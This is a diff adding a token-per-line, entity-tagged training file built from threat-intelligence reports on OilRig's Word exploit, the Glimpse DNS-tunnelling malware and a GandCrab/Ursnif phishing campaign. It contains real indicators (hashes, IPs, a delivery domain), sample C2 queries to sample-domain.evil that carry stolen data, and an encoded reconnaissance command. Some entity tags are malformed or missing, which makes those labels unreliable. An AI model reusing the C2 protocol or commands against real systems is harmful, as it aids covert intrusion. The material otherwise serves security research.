diff --git "a/data/raw/APTNER/APTNERtrain.txt" "b/data/raw/APTNER/APTNERtrain.txt"
new file mode 100644--- /dev/null
+++ "b/data/raw/APTNER/APTNERtrain.txt"
@@ -0,0 +1,189400 @@
+From O
+April B-TIME
+19-24 I-TIME
+, I-TIME
+2017 E-TIME
+, O
+a O
+politically-motivated O
+, O
+targeted O
+campaign O
+was O
+carried O
+out O
+against O
+numerous O
+Israeli S-LOC
+organizations O
+. O
+
+Morphisec B-SECTEAM
+researchers E-SECTEAM
+began O
+investigating O
+the O
+attacks O
+on O
+April B-TIME
+24 E-TIME
+and O
+continue O
+to O
+uncover O
+more O
+details O
+. O
+
+Initial O
+reports O
+of O
+the O
+attacks O
+, O
+published O
+April B-TIME
+26 E-TIME
+( O
+in O
+Hebrew S-LOC
+) O
+by O
+the O
+Israel B-SECTEAM
+National I-SECTEAM
+Cyber I-SECTEAM
+Event I-SECTEAM
+Readiness I-SECTEAM
+Team E-SECTEAM
+( O
+CERT-IL S-SECTEAM
+) O
+and O
+The O
+Marker S-SECTEAM
+, O
+confirm O
+that O
+the O
+attack O
+was O
+delivered O
+through O
+compromised O
+email S-TOOL
+accounts O
+at O
+Ben-Gurion B-IDTY
+University E-IDTY
+and O
+sent O
+to O
+multiple O
+targets O
+across O
+Israel S-LOC
+. O
+
+Ironically O
+, O
+Ben-Gurion B-IDTY
+University E-IDTY
+is O
+home O
+to O
+Israel B-SECTEAM
+’s I-SECTEAM
+Cyber I-SECTEAM
+Security I-SECTEAM
+Research I-SECTEAM
+Center E-SECTEAM
+. O
+
+Investigators O
+put O
+the O
+origin O
+of O
+the O
+attack O
+as O
+Iranian S-LOC
+; O
+Morphisec S-SECTEAM
+’s O
+research O
+supports O
+this O
+conclusion O
+and O
+attributes O
+the O
+attacks O
+to O
+the O
+same O
+infamous O
+hacker O
+group O
+responsible O
+for O
+the O
+OilRig S-MAL
+malware O
+campaigns O
+. O
+
+The O
+fileless B-APT
+attack E-APT
+was O
+delivered O
+via O
+Microsoft B-TOOL
+Word E-TOOL
+documents O
+that O
+exploited O
+a O
+former O
+zero-day S-VULNAME
+vulnerability O
+in O
+Word S-TOOL
+, O
+CVE-2017-0199 S-VULID
+, O
+to O
+install O
+a O
+fileless O
+attack O
+variant O
+of O
+the O
+Helminth S-MAL
+Trojan S-MAL
+agent O
+. O
+
+Microsoft S-IDTY
+released O
+the O
+patch O
+for O
+the O
+vulnerability O
+on O
+April B-TIME
+11 E-TIME
+, O
+but O
+many O
+organizations O
+have O
+not O
+yet O
+deployed O
+the O
+update O
+. O
+
+The O
+attackers O
+actually O
+based O
+their O
+attack O
+on O
+an O
+existing O
+Proof-of-Concept O
+method O
+that O
+was O
+published O
+by O
+researchers O
+after O
+the O
+patch O
+release O
+. O
+
+By O
+hunting O
+through O
+known O
+malware O
+repositories O
+, O
+Morphisec S-SECTEAM
+identified O
+matching O
+samples O
+uploaded O
+by O
+Israeli S-LOC
+high-tech O
+development O
+companies O
+, O
+medical B-IDTY
+organizations E-IDTY
+and O
+education B-IDTY
+organizations E-IDTY
+, O
+indicating O
+that O
+they O
+were O
+victims O
+of O
+the O
+attack O
+. O
+
+For O
+security O
+purposes O
+, O
+Morphisec S-SECTEAM
+is O
+not O
+revealing O
+these O
+names O
+. O
+
+Upon O
+deeper O
+investigation O
+into O
+the O
+installed O
+Helminth S-MAL
+fileless O
+agent O
+, O
+we O
+identified O
+a O
+near O
+perfect O
+match O
+to O
+the O
+OilRig S-MAL
+campaign O
+executed O
+by O
+an O
+Iranian S-LOC
+hacker O
+group O
+against O
+140 O
+financial O
+institutions O
+in O
+the O
+Middle B-LOC
+East E-LOC
+last O
+year O
+, O
+as O
+analyzed O
+by O
+FireEye S-SECTEAM
+, O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks E-SECTEAM
+and O
+Logrhythm S-SECTEAM
+. O
+
+This O
+group O
+has O
+become O
+one O
+of O
+the O
+most O
+active O
+threat O
+actors O
+, O
+with O
+noteworthy O
+abilities O
+, O
+resources O
+and O
+infrastructure O
+; O
+speculations O
+indicate O
+the O
+hacking O
+organization O
+to O
+be O
+sponsored O
+by O
+the O
+Iranian B-IDTY
+government E-IDTY
+. O
+
+In O
+other O
+recent O
+attacks O
+( O
+January B-TIME
+2017 E-TIME
+) O
+, O
+the O
+group O
+used O
+a O
+fake O
+Juniper B-TOOL
+Networks I-TOOL
+VPN E-TOOL
+portal O
+and O
+fake O
+University B-IDTY
+of I-IDTY
+Oxford E-IDTY
+websites O
+to O
+deliver O
+malware O
+as O
+described O
+by O
+ClearSky S-SECTEAM
+. O
+
+Name O
+SHA256 S-ENCR
+. O
+
+13.doc S-FILE
+: O
+a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab S-SHA2
+. O
+
+558.doc S-FILE
+, O
+2.doc: O
+2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84 S-SHA2
+. O
+
+1.doc S-FILE
+: O
+832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 S-SHA2
+. O
+
+3.doc S-FILE
+: O
+d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 S-SHA2
+. O
+
+The O
+most O
+notable O
+difference O
+from O
+last O
+year O
+’s O
+OilRig S-MAL
+campaign O
+is O
+the O
+way O
+the O
+attack O
+was O
+delivered O
+. O
+
+In O
+the O
+previous O
+campaign O
+, O
+the O
+Iranian S-LOC
+group O
+sent O
+specially O
+crafted O
+Excel S-TOOL
+and O
+Word S-TOOL
+files O
+, O
+which O
+contained O
+macros O
+that O
+targeted O
+individuals O
+were O
+convinced O
+to O
+enable O
+. O
+
+Name O
+Delivery O
+Server O
+. O
+
+test4.hta S-FILE
+http://comonscar.in S-URL
+( O
+82.145.40.46 S-IP
+) O
+. O
+
+test5.hta S-FILE
+80.82.67.42 S-IP
+. O
+
+test1.hta S-FILE
+reserved O
+. O
+
+SHA256: O
+5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43 S-SHA2
+. O
+
+Name O
+SHA256 S-ENCR
+. O
+
+0011.ps1 S-FILE
+042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1 S-SHA2
+. O
+
+1.vbs S-FILE
+BE7F1D411CC4160BB221C7181DA4370972B6C867AF110C12850CAD77981976ED S-SHA2
+. O
+
+A O
+Glimpse O
+into O
+Glimpse S-APT
+For O
+the O
+second O
+blog O
+post O
+in O
+our O
+series, O
+the O
+IronNet B-SECTEAM
+Threat I-SECTEAM
+Research I-SECTEAM
+Team E-SECTEAM
+examines O
+the O
+Glimpse S-MAL
+malware O
+that O
+is O
+written O
+in O
+PowerShell S-TOOL
+and O
+has O
+been O
+associated O
+with O
+OilRig S-APT/APT34 S-APT
+. O
+
+Our O
+first O
+post O
+about O
+analyzing O
+malware O
+with O
+DNS PROT
+tunneling O
+capabilities O
+focuses O
+on O
+how O
+the O
+PoisonFrog S-MAL
+malware O
+uses O
+DNS B-ACT
+tunneling E-ACT
+to O
+send O
+and O
+receive O
+victim O
+information O
+and O
+commands O
+. O
+
+Glimpse S-MAL
+: O
+6e86c57385d26a59c0df1580454b9967 S-MD5
+. O
+
+Glimpse S-MAL
+is O
+a O
+PowerShell S-TOOL
+script O
+that O
+is O
+executed O
+silently O
+by O
+Visual B-TOOL
+Basic E-TOOL
+script
+. O
+
+Based O
+on O
+the O
+code, O
+it O
+is O
+unclear O
+what O
+initiates O
+the O
+Visual B-TOOL
+Basic E-TOOL
+script O
+itself
+. O
+
+However, O
+a O
+variety O
+of O
+typical O
+persistence O
+mechanisms, O
+such O
+as O
+a O
+scheduled O
+task, O
+could O
+serve O
+that O
+purpose
+. O
+
+After O
+Glimpse S-MAL
+starts, O
+it O
+checks O
+for O
+the O
+existence O
+of O
+a O
+directory O
+and O
+lock O
+file
+. O
+
+If O
+no O
+directory O
+or O
+lock O
+file O
+is O
+found, O
+Glimpse S-MAL
+creates O
+one
+. O
+
+Alternatively, O
+if O
+these O
+do O
+exist O
+and O
+the O
+lock O
+file O
+is O
+older O
+than O
+10 O
+minutes, O
+the O
+lock O
+file O
+is O
+deleted O
+and O
+the O
+previously O
+running O
+Glimpse S-MAL
+script O
+is O
+killed
+. O
+
+After O
+the O
+initial O
+checks O
+described O
+above, O
+Glimpse S-MAL
+creates O
+a O
+hidden O
+file O
+that O
+contains O
+an O
+agent O
+ID, O
+which O
+is O
+a O
+simple O
+concatenation O
+of O
+a O
+random O
+number O
+10-99 O
+and O
+the O
+first O
+8 O
+characters O
+of O
+a O
+GUID S-TOOL
+without O
+dashes
+. O
+
+The O
+methods O
+employed O
+by O
+Glimpse S-MAL
+to O
+perform O
+DNS PROT
+communications O
+are O
+determined O
+by O
+the O
+mode O
+in O
+which O
+it O
+is O
+operating O
+(i.e., O
+text O
+mode O
+or O
+ping O
+mode
+) O
+. O
+
+In O
+text O
+mode, O
+Glimpse S-MAL
+manually O
+builds B-ACT
+a I-ACT
+DNS I-ACT
+query E-ACT
+to O
+be O
+transmitted O
+over O
+a O
+UDP B-TOOL
+socket E-TOOL
+. O
+
+In O
+ping O
+mode, O
+Glimpse S-MAL
+uses O
+a B-FILE
+.NET E-FILE
+method
+. O
+
+The O
+table O
+below O
+describes O
+the O
+operational O
+mode, O
+record O
+types O
+used, O
+and O
+the O
+method O
+used O
+to O
+send O
+the O
+query
+. O
+
+The O
+first O
+DNS PROT
+query O
+by O
+Glimpse S-MAL
+requests O
+the O
+mode O
+to O
+be O
+used O
+in O
+future O
+communications O
+with O
+the O
+controller O
+(i.e., O
+ping O
+mode O
+or O
+text O
+mode
+) O
+. O
+
+Prior O
+to O
+making O
+any O
+query, O
+a O
+function O
+called O
+AdrGen O
+is O
+used O
+to O
+build O
+a O
+query O
+string
+. O
+
+This O
+function O
+takes O
+several O
+parameters, O
+most O
+of O
+which O
+are O
+represented O
+in O
+the O
+subdomain O
+label(s) O
+of O
+the O
+query O
+string
+. O
+
+Below O
+is O
+a O
+list O
+of O
+AdrGen O
+parameters
+. O
+
+As O
+mentioned O
+above, O
+one O
+of O
+the O
+parameters O
+passed O
+to O
+the O
+AdrGen O
+function O
+is O
+the O
+action O
+parameter
+. O
+
+Table O
+5: O
+Glimpse S-MAL
+action O
+parameters O
+values O
+for O
+the O
+AdrGen O
+function O
+below O
+contains O
+the O
+possible O
+parameters, O
+a O
+brief O
+description, O
+and O
+return O
+values O
+applicable O
+to O
+the O
+action O
+parameter
+. O
+
+The O
+query O
+to O
+set O
+the O
+receive O
+mode O
+expects O
+an O
+A O
+resource O
+record O
+response O
+from O
+the O
+controller
+. O
+
+The O
+controller O
+will O
+respond O
+with O
+one O
+of O
+two O
+responses: O
+99.250.250.199 S-IP
+will O
+set O
+the O
+receive O
+mode O
+to O
+text
+. O
+
+Any O
+other O
+IP O
+address O
+will O
+set O
+the O
+receive O
+mode O
+to O
+ping, O
+although O
+the O
+server-side O
+software O
+suggests O
+199.250.250.99 S-IP
+will O
+be O
+sent
+. O
+
+When O
+set O
+in O
+text O
+receive O
+mode, O
+the O
+malware O
+uses O
+the O
+AdrGen O
+function O
+to O
+create O
+another O
+query O
+string O
+with O
+the O
+r O
+(receiver) O
+flag O
+and O
+a O
+W O
+(wait) O
+action O
+parameter
+. O
+
+The O
+expected O
+TXT O
+record O
+response O
+has O
+the O
+following O
+structure: O
+command>data
+. O
+
+In O
+our O
+sample O
+traffic, O
+the O
+TXT O
+resource O
+record O
+returned O
+contained: O
+S000s>10100
+. O
+
+This O
+response O
+tells O
+the O
+malware O
+to O
+set O
+a O
+variable O
+for O
+the O
+file O
+name O
+to O
+receivebox\rcvd10100 S-FILE
+and O
+set O
+the O
+next O
+query O
+action O
+to O
+D O
+in O
+order O
+to O
+request O
+the O
+next O
+chunk O
+of O
+data
+. O
+
+The O
+malware O
+sends O
+another O
+TXT O
+query O
+with O
+the O
+receiver O
+structure
+. O
+
+This O
+query O
+is O
+depicted O
+below: O
+39e9D60005eca60000BCC64T.sample-domain.evil S-FILE
+In O
+the O
+case O
+of O
+our O
+sample O
+traffic, O
+the O
+server O
+responded O
+with O
+the O
+following O
+TXT O
+resource O
+record O
+data: O
+S0000>d2hvYW1pJmlwY29uZmlnIC9hbGw=
+. O
+
+The O
+controller O
+provided O
+the O
+malware O
+with O
+base64-encoded S-ENCR
+data O
+to O
+be O
+decoded
+. O
+
+The O
+data O
+will O
+eventually O
+be O
+written O
+to O
+disk O
+and O
+the O
+malware O
+sets O
+the O
+next O
+query O
+action O
+to O
+D O
+in O
+order O
+to O
+request O
+the O
+next O
+chunk O
+of O
+data
+. O
+
+The O
+decoded O
+data O
+shows O
+a O
+command O
+to O
+be O
+executed B-ACT
+whoami&ipconfig I-ACT
+/all E-ACT
+on O
+the O
+victim O
+system
+. O
+
+The O
+malware O
+sends O
+another O
+TXT O
+query O
+with O
+the O
+receiver O
+structure, O
+as O
+depicted O
+below
+. O
+
+Note O
+the O
+request O
+number O
+parameter O
+is O
+now O
+0001: O
+39e965e000caD60001679C79T.sample-domain.evil S-FILE
+. O
+
+The O
+TXT O
+record O
+returned O
+contained O
+data: O
+E0000>0 O
+. O
+
+The O
+controller O
+issued O
+the O
+command O
+to O
+write O
+the O
+base64-decoded O
+and O
+modified O
+data O
+to O
+the O
+file O
+name O
+set O
+earlier O
+in O
+the O
+exchange O
+. O
+
+After O
+the O
+file O
+is O
+written, O
+the O
+malware O
+moves O
+on O
+to O
+process O
+operations O
+. O
+
+Glimpse S-MAL
+can O
+be O
+set O
+to O
+use O
+ping O
+mode O
+in O
+several O
+ways O
+while O
+performing O
+receive O
+operations O
+. O
+
+If O
+a O
+query O
+with O
+the O
+M O
+action O
+returns O
+an O
+IP O
+address O
+that O
+is O
+not O
+99.250.250.199 S-IP
+, O
+the O
+malware O
+will O
+use O
+ping O
+mode O
+. O
+
+It O
+is O
+worth O
+noting O
+that O
+the O
+IP O
+response O
+observed O
+to O
+set O
+ping O
+mode O
+was O
+the O
+reverse O
+of O
+the O
+IP O
+used O
+to O
+set O
+text O
+mode O
+(i.e., O
+199.250.250.99 S-IP
+) O
+. O
+
+Ping O
+mode O
+will O
+also O
+be O
+set O
+if O
+exceptions O
+occur O
+more O
+than O
+three O
+times O
+during O
+text O
+mode
+. O
+
+In O
+the O
+latter O
+case, O
+the O
+P O
+action O
+is O
+passed O
+as O
+one O
+of O
+the O
+parameters O
+to O
+AdrGen O
+and O
+the O
+query O
+is O
+made O
+for O
+an O
+A O
+resource O
+record O
+using O
+the O
+[System.Net.Dns]::GetHostAddresses O
+method
+. O
+
+If O
+performing O
+receive O
+operations O
+in O
+ping O
+mode, O
+Glimpse S-MAL
+makes O
+a O
+query O
+with O
+the O
+0 O
+action O
+to O
+contact O
+the O
+controller O
+for O
+tasking
+. O
+
+This O
+query O
+uses O
+a O
+receive O
+structure O
+similar O
+to O
+an O
+M O
+action; O
+it O
+is O
+worth O
+noting O
+all O
+of O
+the O
+receiver O
+operation O
+queries O
+made O
+in O
+ping O
+mode O
+use O
+the O
+[System.Net.Dns]::GetHostAddresses O
+method
+. O
+
+In O
+our O
+sample, O
+after O
+the O
+malware O
+sent O
+the O
+0 O
+action, O
+the O
+controller O
+responded O
+with O
+an O
+A O
+record O
+containing O
+24.125.10.140 S-IP
+. O
+
+This O
+response O
+tells O
+the O
+malware O
+to: O
+Set O
+the O
+file O
+name O
+for O
+the O
+data O
+that O
+will O
+follow O
+to O
+10140, O
+Set O
+the O
+part O
+number O
+to O
+0, O
+Parse O
+response O
+data, O
+Set O
+a O
+1 O
+action O
+for O
+the O
+next O
+query
+. O
+
+Query: O
+00039e9650eca66C06T.sample-domain.evil S-FILE
+, O
+Response: O
+24.125.10.140 S-IP
+, O
+File O
+name: O
+10140, O
+Query: O
+139e965e000ca6D2C80T.sample-domain.evil S-FILE
+, O
+Response: O
+110.101.116.0 S-IP
+, O
+Query: O
+00339e965e1ca6EF4C07T.sample-domain.evil S-FILE
+, O
+Response: O
+32.117.115.3 S-IP
+, O
+Query: O
+30069e O
+1965eca6FE8C13T.sample-domain.evil, O
+Response: O
+101.114.32.6 S-IP
+, O
+Query: O
+391 B-FILE
+e960095eca63570BC62T.sample-domain.evil E-FILE
+, O
+Response: O
+1.2.3.0 S-IP
+. O
+
+In O
+this O
+case, O
+the O
+content O
+net O
+user O
+is O
+written O
+to O
+rcvd10140
+. O
+
+After O
+writing O
+the O
+data O
+to O
+disk, O
+receiver O
+operations O
+are O
+complete O
+and O
+processor O
+operations O
+begin
+. O
+
+After O
+writing O
+the O
+data O
+received O
+from O
+the O
+controller, O
+a O
+function O
+is O
+called O
+to O
+process O
+the O
+received O
+file
+. O
+
+The O
+processor O
+function O
+builds O
+a O
+list O
+of O
+files O
+from O
+the O
+files O
+with O
+content O
+that O
+match O
+rcvd* O
+in O
+the O
+receivebox O
+directory
+. O
+
+Similar O
+to O
+PoisonFrog S-MAL
+, O
+the O
+last O
+digit O
+of O
+the O
+received O
+file O
+name O
+determines O
+how O
+the O
+content O
+of O
+the O
+file O
+is O
+processed
+. O
+
+In O
+our O
+sample O
+traffic, O
+after O
+executing O
+the O
+commands O
+sent O
+via O
+cmd.exe S-FILE
+, O
+Glimpse S-MAL
+writes O
+the O
+output O
+of O
+the O
+commands O
+in O
+the O
+sendbox O
+directory O
+to O
+the O
+appropriate O
+file O
+names O
+(e.g., O
+10100 O
+or O
+10140) O
+prepended O
+with O
+proc O
+(e.g., O
+proc10100
+) O
+. O
+
+Once O
+written, O
+the O
+send O
+operations O
+begin
+. O
+
+Similar O
+to O
+text O
+mode O
+receiver, O
+after O
+AdrGen S-MAL
+builds O
+the O
+string, O
+a O
+function O
+to O
+manually O
+build O
+and O
+send O
+the O
+DNS PROT
+query O
+packet O
+is O
+called
+. O
+
+The O
+text O
+mode O
+sender O
+uses O
+the O
+same O
+hardcoded O
+transaction O
+ID O
+0xa4a3; O
+however, O
+instead O
+of O
+sending O
+queries O
+for O
+TXT O
+resource O
+records, O
+the O
+malware O
+uses O
+A O
+resource O
+records
+. O
+
+As O
+with O
+the O
+text O
+mode O
+receiver, O
+the O
+query O
+is O
+made O
+with O
+a O
+direct O
+connection O
+to O
+the O
+controller O
+IP O
+address O
+as O
+opposed O
+to O
+allowing O
+the O
+query O
+to O
+propagate O
+the O
+native O
+DNS PROT
+architecture
+. O
+
+If O
+the O
+send O
+function O
+is O
+being O
+invoked O
+in O
+ping O
+mode, O
+the O
+process O
+described O
+above O
+is O
+followed; O
+however, O
+instead O
+of O
+manually O
+building O
+and O
+transmitting O
+the O
+DNS PROT
+query, O
+the O
+[System.Net.Dns]::GetHostAddresses O
+method O
+is O
+used
+. O
+
+With O
+that O
+method, O
+the O
+malware’s O
+query O
+will O
+traverse O
+the O
+native O
+DNS PROT
+architecture O
+as O
+opposed O
+to O
+the O
+victim O
+making O
+a O
+direct O
+connection O
+to O
+the O
+controller
+. O
+
+The O
+send O
+function O
+uses O
+several O
+counters O
+to O
+maintain O
+various O
+pieces O
+of O
+information O
+used O
+to O
+control O
+the O
+flow O
+of O
+execution
+. O
+
+An O
+exception O
+counter O
+is O
+used O
+to O
+track O
+the O
+number O
+of O
+exceptions O
+and O
+will O
+exit O
+the O
+send O
+loop O
+if O
+a O
+threshold O
+is O
+hit
+. O
+
+The O
+send O
+counter O
+is O
+used O
+to O
+track O
+the O
+number O
+of O
+chunks O
+sent O
+to O
+the O
+controller
+. O
+
+An O
+additional O
+counter O
+exists O
+to O
+handle O
+cases O
+where O
+the O
+file O
+being O
+sent O
+is O
+larger O
+than O
+250 O
+chunks
+. O
+
+The O
+send O
+counter O
+is O
+initialized O
+to O
+0 O
+and O
+read O
+from O
+the O
+fourth O
+octet O
+of O
+the O
+A O
+record O
+returned O
+by O
+the O
+controller
+. O
+
+The O
+send O
+counter O
+is O
+also O
+passed O
+to O
+the O
+AdrGen S-MAL
+function O
+as O
+the O
+part O
+number O
+parameter O
+and O
+is O
+visible O
+in O
+the O
+query O
+string O
+as O
+depicted O
+below: O
+Query: O
+239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil S-FILE
+, O
+Response: O
+39.2.3.1 S-IP
+, O
+Query: O
+230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil S-FILE
+, O
+Response: O
+39.2.3.2 S-IP
+, O
+Query: O
+392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil S-FILE
+. O
+
+When O
+the O
+send O
+loop O
+has O
+fewer O
+than O
+60 O
+bytes O
+to O
+send O
+(e.g., O
+a O
+small O
+file O
+or O
+the O
+last O
+part O
+of O
+a O
+file), O
+the O
+send O
+function O
+transmits O
+the O
+remaining O
+bytes O
+with O
+a O
+shorter O
+data O
+section
+. O
+
+When O
+there O
+are O
+no O
+more O
+bytes O
+to O
+send, O
+a O
+hardcoded O
+file O
+end O
+marker O
+COCTabCOCT O
+is O
+sent O
+in O
+the O
+data O
+section O
+and O
+the O
+send O
+loop O
+will O
+be O
+exited
+. O
+
+The O
+controller O
+responds O
+with O
+the O
+253.25.42.87 S-IP
+A O
+record O
+response
+. O
+
+Query: O
+239055e965eca60000CC30T.66654667676673003300C93CC92212953EDACEDA.33333210100A.sample-domain.evil S-FILE
+, O
+Response: O
+39.2.3.56 S-IP
+, O
+Query: O
+05639e9652eca6000057C06T.COCTabCOCT33333210100A.sample-domain.evil S-FILE
+, O
+Response: O
+253.25.42.87 S-IP
+. O
+
+Once O
+an O
+A O
+record O
+response O
+is O
+received O
+by O
+the O
+malware O
+containing O
+253.25.42.87 S-IP
+, O
+several O
+variables O
+are O
+set O
+in O
+preparation O
+to O
+exit O
+the O
+send O
+operation
+. O
+
+After O
+the O
+send O
+operation O
+is O
+complete, O
+the O
+lock O
+file O
+for O
+the O
+current O
+run O
+is O
+deleted O
+and O
+the O
+script O
+exits
+. O
+
+Many O
+of O
+the O
+capabilities O
+discovered O
+in O
+Glimpse S-MAL
+were O
+also O
+present O
+in O
+the O
+malware O
+analyzed O
+in O
+part O
+one O
+of O
+this O
+series
+. O
+
+Glimpse S-MAL
+added O
+the O
+ability O
+to O
+use O
+an O
+alternate O
+DNS PROT
+resource O
+record O
+type O
+(TXT) O
+as O
+opposed O
+to O
+solely O
+relying O
+on O
+A O
+resource O
+records O
+for O
+DNS PROT
+queries
+. O
+
+Using O
+TXT O
+resource O
+records O
+enabled O
+the O
+actors O
+to O
+provide O
+tasking O
+in O
+fewer O
+transactions O
+due O
+to O
+the O
+amount O
+of O
+data O
+that O
+can O
+be O
+transmitted O
+in O
+a O
+TXT O
+response
+. O
+
+To O
+support O
+this O
+capability, O
+the O
+adversaries O
+chose O
+to O
+manually O
+craft O
+the O
+DNS PROT
+queries O
+and O
+communicate O
+directly O
+with O
+the O
+controller O
+as O
+opposed O
+to O
+using O
+existing O
+.NET S-FILE
+DNS PROT
+libraries
+. O
+
+The O
+differences O
+between O
+PoisonFrog S-MAL
+and O
+Glimpse S-MAL
+highlight O
+the O
+ease O
+at O
+which O
+adversaries O
+can O
+modify O
+their O
+tools O
+to O
+meet O
+their O
+end O
+objectives
+. O
+
+With O
+regard O
+to O
+detection, O
+several O
+methods O
+can O
+be O
+used O
+to O
+identify O
+this O
+type O
+of O
+C2 S-TOOL
+activity
+. O
+
+Performing O
+entropy O
+calculations O
+on O
+subdomain O
+labels O
+can O
+help O
+highlight O
+the O
+amount O
+of O
+randomness O
+in O
+a O
+label, O
+but O
+this O
+is O
+just O
+one O
+of O
+many O
+possible O
+data O
+analysis O
+points, O
+since O
+a O
+standalone O
+feature O
+may O
+not O
+be O
+enough O
+to O
+determine O
+whether O
+traffic O
+is O
+malicious
+. O
+
+The O
+IronDefense O
+Network O
+Traffic O
+Analysis O
+platform O
+combines O
+several O
+behavioral O
+detection O
+methods O
+alongside O
+historical O
+network O
+information O
+to O
+detect O
+the O
+C2 S-TOOL
+techniques O
+used O
+by O
+Glimpse S-MAL
+and O
+other O
+malware
+. O
+
+
+Carbon B-SECTEAM
+Black I-SECTEAM
+TAU I-SECTEAM
+ThreatSight E-SECTEAM
+Analysis O
+GandCrab S-MAL
+and O
+Ursnif S-MAL
+Campaign
+. O
+
+The O
+Carbon B-SECTEAM
+Black I-SECTEAM
+ThreatSight E-SECTEAM
+team O
+observed O
+an O
+interesting O
+campaign O
+over O
+the O
+last O
+month O
+. O
+
+ThreatSight S-SECTEAM
+worked O
+with O
+the O
+Threat B-IDTY
+Analysis I-IDTY
+Unit E-IDTY
+( O
+TAU S-IDTY
+) O
+to O
+research O
+the O
+campaign O
+. O
+
+This O
+report O
+is O
+being O
+released O
+to O
+help O
+researchers O
+and O
+security O
+practitioners O
+combat O
+this O
+campaign O
+as O
+new O
+samples O
+are O
+being O
+discovered O
+in O
+the O
+wild O
+daily O
+. O
+
+This O
+attack O
+, O
+if O
+successful O
+, O
+can O
+infect O
+a O
+compromised O
+system O
+with O
+both O
+Ursnif S-MAL
+malware O
+and O
+GandCrab S-MAL
+ransomware O
+. O
+
+The O
+overall O
+attack O
+leverages O
+several O
+different O
+approaches O
+, O
+which O
+are O
+popular O
+techniques O
+amongst O
+red O
+teamers O
+, O
+espionage O
+focused O
+adversaries O
+, O
+and O
+large O
+scale O
+criminal O
+campaigns O
+. O
+
+This O
+campaign O
+originally O
+came O
+in O
+via O
+phishing B-ACT
+emails E-ACT
+that O
+contained O
+an O
+attached O
+Word B-TOOL
+document E-TOOL
+with O
+embedded O
+macros O
+, O
+Carbon B-SECTEAM
+Black E-SECTEAM
+located O
+roughly O
+180 O
+variants O
+in O
+the O
+wild O
+. O
+
+The O
+macro O
+would O
+call O
+an O
+encoded O
+PowerShell S-TOOL
+script O
+and O
+then O
+use O
+a O
+series O
+of O
+techniques O
+to O
+download O
+and O
+execute O
+both O
+a O
+Ursnif S-MAL
+and O
+GandCrab S-MAL
+variant O
+. O
+
+This O
+campaign O
+has O
+been O
+discussed O
+at O
+a O
+high O
+level O
+by O
+other O
+researchers O
+publicly O
+. O
+
+Carbon B-SECTEAM
+Black E-SECTEAM
+product O
+specific O
+content O
+can O
+be O
+located O
+in O
+the O
+User B-TOOL
+Exchange E-TOOL
+. O
+
+In O
+this O
+campaign O
+the O
+attackers O
+used O
+a O
+MS B-TOOL
+Word E-TOOL
+document O
+( O
+.doc S-FILE
+format O
+) O
+to O
+deliver O
+the O
+initial O
+stages O
+. O
+
+It O
+should O
+be O
+noted O
+that O
+out O
+of O
+the O
+roughly O
+180 O
+Word S-TOOL
+variants O
+that O
+were O
+located O
+by O
+Carbon B-SECTEAM
+Black E-SECTEAM
+, O
+the O
+biggest O
+difference O
+in O
+the O
+documents O
+was O
+the O
+metadata O
+and O
+junk O
+data O
+located O
+in O
+the O
+malicious O
+macros O
+. O
+
+However O
+the O
+metadata O
+clearly O
+showed O
+that O
+the O
+documents O
+prepared O
+for O
+this O
+campaign O
+were O
+initially O
+saved O
+on O
+December B-TIME
+17 I-TIME
+, I-TIME
+2018 E-TIME
+and O
+have O
+continued O
+to O
+be O
+updated O
+through O
+January B-TIME
+21 I-TIME
+, I-TIME
+2019 E-TIME
+. O
+
+Several O
+metadata O
+fields O
+( O
+specifically O
+title O
+, O
+subject O
+, O
+author O
+, O
+comments O
+, O
+manager O
+, O
+and O
+company O
+) O
+appear O
+to O
+have O
+been O
+populated O
+with O
+different O
+data O
+sets O
+. O
+
+For O
+example O
+the O
+subject O
+in O
+all O
+the O
+samples O
+was O
+a O
+combination O
+of O
+a O
+US S-LOC
+state O
+and O
+a O
+common O
+first O
+name O
+( O
+like O
+Utah S-LOC
+Erick O
+or O
+Tennessee S-LOC
+Dayna O
+) O
+. O
+
+For O
+this O
+post O
+the O
+following O
+sample O
+was O
+analyzed O
+. O
+
+Richard_Johnson.doc S-FILE
+: O
+878e4e8677e68aba918d930f2cc67fbe S-MD5
+0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080 S-SHA2
+. O
+
+The O
+document O
+contained O
+a O
+VBS B-TOOL
+macro E-TOOL
+that O
+once O
+decompressed O
+was O
+approximately O
+650 O
+lines O
+of O
+code O
+. O
+
+The O
+vast O
+majority O
+of O
+that O
+was O
+junk O
+code O
+. O
+
+Once O
+the O
+junk O
+code O
+was O
+removed O
+from O
+the O
+VBScript S-TOOL
+, O
+there O
+are O
+approximately O
+18 O
+lines O
+of O
+relevant O
+code O
+, O
+which O
+ultimately O
+call O
+a O
+shape O
+box O
+in O
+the O
+current O
+document O
+. O
+
+The O
+variable O
+names O
+themselves O
+are O
+not O
+relevant O
+, O
+however O
+the O
+methods O
+in O
+bold O
+below O
+will O
+retrieve O
+the O
+AlternativeText S-TOOL
+field O
+from O
+the O
+specified O
+shape O
+, O
+which O
+is O
+then O
+executed O
+. O
+
+The O
+alternate O
+text O
+can O
+easily O
+be O
+observed O
+in O
+the O
+body O
+of O
+the O
+office O
+document O
+. O
+
+The O
+area O
+highlighted O
+in O
+blue O
+is O
+the O
+shape O
+name O
+that O
+is O
+being O
+located O
+, O
+while O
+the O
+text O
+itself O
+is O
+highlighted O
+in O
+red O
+. O
+
+It O
+is O
+clear O
+that O
+the O
+text O
+is O
+a O
+base64 S-ENCR
+encoded O
+command O
+, O
+that O
+is O
+then O
+executed O
+by O
+the O
+above O
+VBScript S-TOOL
+. O
+
+The O
+PowerShell S-TOOL
+script O
+will O
+first O
+create O
+an O
+instance O
+of O
+the O
+.Net S-FILE
+Webclient O
+class O
+and O
+then O
+enumerate O
+the O
+available O
+methods O
+using O
